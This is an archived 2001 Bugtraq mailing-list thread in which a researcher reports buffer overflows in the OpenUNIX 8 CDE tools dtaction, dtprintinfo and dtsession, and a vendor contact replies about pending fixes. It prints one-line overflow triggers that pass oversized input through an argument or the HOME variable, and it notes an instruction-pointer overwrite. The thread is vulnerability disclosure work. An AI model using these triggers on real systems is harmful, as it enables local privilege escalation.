[Fwd: OpenUnix 8 dtaction dtprintinfo dtsession overflows]

From: KF (dotslashat_private)
Date: Thu Aug 02 2001 - 02:17:28 PDT

Next message: FraMe: "Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?"

Previous message: Mike Duncan: "Re: Advisory Update: Design Flaw in Linksys EtherFast 4-Port Cable/DSL Router"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Subject: dtaction dtprintinfo dtsession overflows
Date: Wed, 01 Aug 2001 23:27:26 -0400
From: KF <dotslashat_private>
To: tiggerat_private, reconat_private

Bugtraq Bound...thought I would let ya know. 

/usr/dt/bin/dtaction `perl -e 'print "A" x 9000'`
or 
HOME=`perl -e 'print "A" x 9000'`;/usr/dt/bin/dtaction

HOME=`perl -e 'print "A" x 9000'`;/usr/dt/bin/dtprintinfo 
(positive eip hit on this one)

HOME=`perl -e 'print "A" x 9000'`;/usr/dt/bin/dtsession

uname -a 

OpenUNIX unixware8 5 8.0.0 i386 x86at Caldera UNIX_SVR5 

-KF

-----------------------------------------------

Subject: 
           Re: dtaction dtprintinfo dtsession overflows
      Date: 
           Thu, 2 Aug 2001 14:16:49 -0700
      From: 
           tiggerat_private
        To: 
           dotslashat_private
 References: 
           1




To: dotslashat_private

We had already fixed the dtaction problem; the others are known but
not yet fixed. All fixes are due out soon.

        Thanks,

                Andrew

Next message: FraMe: "Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?"
Previous message: Mike Duncan: "Re: Advisory Update: Design Flaw in Linksys EtherFast 4-Port Cable/DSL Router"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Aug 03 2001 - 07:52:19 PDT